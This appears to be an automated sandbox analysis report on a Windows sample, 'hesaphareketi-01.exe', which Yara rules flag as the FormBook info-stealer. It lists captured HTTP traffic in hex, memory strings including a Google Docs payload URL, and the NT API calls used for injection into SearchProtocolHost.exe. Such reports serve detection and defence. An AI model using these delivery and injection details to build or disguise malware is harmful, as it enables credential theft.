b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:10:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesData Raw: 35 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 79 6f 74 75 6e 64 65 77 72 69 74 65 73 2e 63 6f 6d 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78
        Source: hesaphareketi-01.exe, 00000009.00000003.1273738509.000000000729D000.00000004.00000020.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: hesaphareketi-01.exe, 00000009.00000003.1273738509.000000000729D000.00000004.00000020.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: hesaphareketi-01.exe, 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp, hesaphareketi-01.exe, 00000000.00000000.689469037.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: hesaphareketi-01.exe, 00000009.00000001.1145004026.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: hesaphareketi-01.exe, 00000009.00000003.1273738509.000000000729D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-ag-docs.googleusercontent.com/
        Source: hesaphareketi-01.exe, 00000009.00000003.1273738509.000000000729D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-ag-docs.googleusercontent.com/%%doc-0g-ag-docs.googleusercontent.com
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-ag-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/afsc4ag5
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.11.30:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.40.129:443 -> 192.168.11.30:49748 version: TLS 1.2
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405425

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D4260 NtSetContextThread,LdrInitializeThunk,19_2_037D4260
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D4570 NtSuspendThread,LdrInitializeThunk,19_2_037D4570
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D34E0 NtCreateMutant,LdrInitializeThunk,19_2_037D34E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2B10 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_037D2B10
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2B00 NtQueryValueKey,LdrInitializeThunk,19_2_037D2B00
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2BC0 NtQueryInformationToken,LdrInitializeThunk,19_2_037D2BC0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2B90 NtFreeVirtualMemory,LdrInitializeThunk,19_2_037D2B90
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2B80 NtCreateKey,LdrInitializeThunk,19_2_037D2B80
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2A10 NtWriteFile,LdrInitializeThunk,19_2_037D2A10
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2AC0 NtEnumerateValueKey,LdrInitializeThunk,19_2_037D2AC0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2A80 NtClose,LdrInitializeThunk,19_2_037D2A80
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D29F0 NtReadFile,LdrInitializeThunk,19_2_037D29F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D38D0 NtGetContextThread,LdrInitializeThunk,19_2_037D38D0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2F00 NtCreateFile,LdrInitializeThunk,19_2_037D2F00
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2E50 NtCreateSection,LdrInitializeThunk,19_2_037D2E50
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2E00 NtQueueApcThread,LdrInitializeThunk,19_2_037D2E00
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2ED0 NtResumeThread,LdrInitializeThunk,19_2_037D2ED0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2D10 NtQuerySystemInformation,LdrInitializeThunk,19_2_037D2D10
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2DA0 NtReadVirtualMemory,LdrInitializeThunk,19_2_037D2DA0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2C50 NtUnmapViewOfSection,LdrInitializeThunk,19_2_037D2C50
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2C30 NtMapViewOfSection,LdrInitializeThunk,19_2_037D2C30
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2CF0 NtDelayExecution,LdrInitializeThunk,19_2_037D2CF0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2B20 NtQueryInformationProcess,19_2_037D2B20
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2BE0 NtQueryVirtualMemory,19_2_037D2BE0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2AA0 NtQueryInformationFile,19_2_037D2AA0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D29D0 NtWaitForSingleObject,19_2_037D29D0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2F30 NtOpenDirectoryObject,19_2_037D2F30
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2FB0 NtSetValueKey,19_2_037D2FB0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2EC0 NtQuerySection,19_2_037D2EC0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2EB0 NtProtectVirtualMemory,19_2_037D2EB0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2E80 NtCreateProcessEx,19_2_037D2E80
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2D50 NtWriteVirtualMemory,19_2_037D2D50
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2DC0 NtAdjustPrivilegesToken,19_2_037D2DC0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D3C30 NtOpenProcessToken,19_2_037D3C30
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2C20 NtSetInformationFile,19_2_037D2C20
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2C10 NtOpenProcess,19_2_037D2C10
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D2CD0 NtEnumerateKey,19_2_037D2CD0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D3C90 NtOpenThread,19_2_037D3C90
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DB5090 NtAllocateVirtualMemory,19_2_02DB5090
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DB4EE0 NtDeleteFile,19_2_02DB4EE0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DB4E20 NtReadFile,19_2_02DB4E20
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DB4F60 NtClose,19_2_02DB4F60
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DB4CF0 NtCreateFile,19_2_02DB4CF0
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00406ADD0_2_00406ADD
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_004072B40_2_004072B4
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FD708F12_2_00FD708F
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FD080A12_2_00FD080A
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FD229F12_2_00FD229F
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FD229612_2_00FD2296
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FECBBF12_2_00FECBBF
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FD24BF12_2_00FD24BF
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FD053F12_2_00FD053F
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FD87EF12_2_00FD87EF
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FD87EB12_2_00FD87EB
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AE31019_2_037AE310
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379138019_2_03791380
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378D2EC19_2_0378D2EC
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385124C19_2_0385124C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037E717A19_2_037E717A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F11319_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386010E19_2_0386010E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383D13019_2_0383D130
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A51C019_2_037A51C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038570F119_2_038570F1
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AB0D019_2_037AB0D0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037900A019_2_037900A0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384E07619_2_0384E076
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A276019_2_037A2760
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AA76019_2_037AA760
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385675719_2_03856757
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C467019_2_037C4670
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385A6C019_2_0385A6C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038136EC19_2_038136EC
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385F6F619_2_0385F6F6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BC60019_2_037BC600
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379C6E019_2_0379C6E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383D62C19_2_0383D62C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384D64619_2_0384D646
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A068019_2_037A0680
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038575C619_2_038575C6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385F5C919_2_0385F5C9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386A52619_2_0386A526
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A044519_2_037A0445
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03814BC019_2_03814BC0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0B1019_2_037A0B10
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385FB2E19_2_0385FB2E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AEB8019_2_037AEB80
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385FA8919_2_0385FA89
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385CA1319_2_0385CA13
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BFAA019_2_037BFAA0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385EA5B19_2_0385EA5B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385E9A619_2_0385E9A6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379E9A019_2_0379E9A0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A987019_2_037A9870
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BB87019_2_037BB870
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378686819_2_03786868
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038198B219_2_038198B2
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038518DA19_2_038518DA
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038578F319_2_038578F3
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A380019_2_037A3800
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384083519_2_03840835
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A28C019_2_037A28C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385F87219_2_0385F872
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B688219_2_037B6882
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385EFBF19_2_0385EFBF
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03851FC619_2_03851FC6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A6FE019_2_037A6FE0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385FF6319_2_0385FF63
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03850EAD19_2_03850EAD
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C0E5019_2_037C0E50
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03859ED219_2_03859ED2
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A1EB219_2_037A1EB2
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03840E6D19_2_03840E6D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A0D6919_2_037A0D69
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383FDF419_2_0383FDF4
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379AD0019_2_0379AD00
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385FD2719_2_0385FD27
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A9DD019_2_037A9DD0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03857D4C19_2_03857D4C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B2DB019_2_037B2DB0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A3C6019_2_037A3C60
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03839C9819_2_03839C98
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AAC2019_2_037AAC20
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03790C1219_2_03790C12
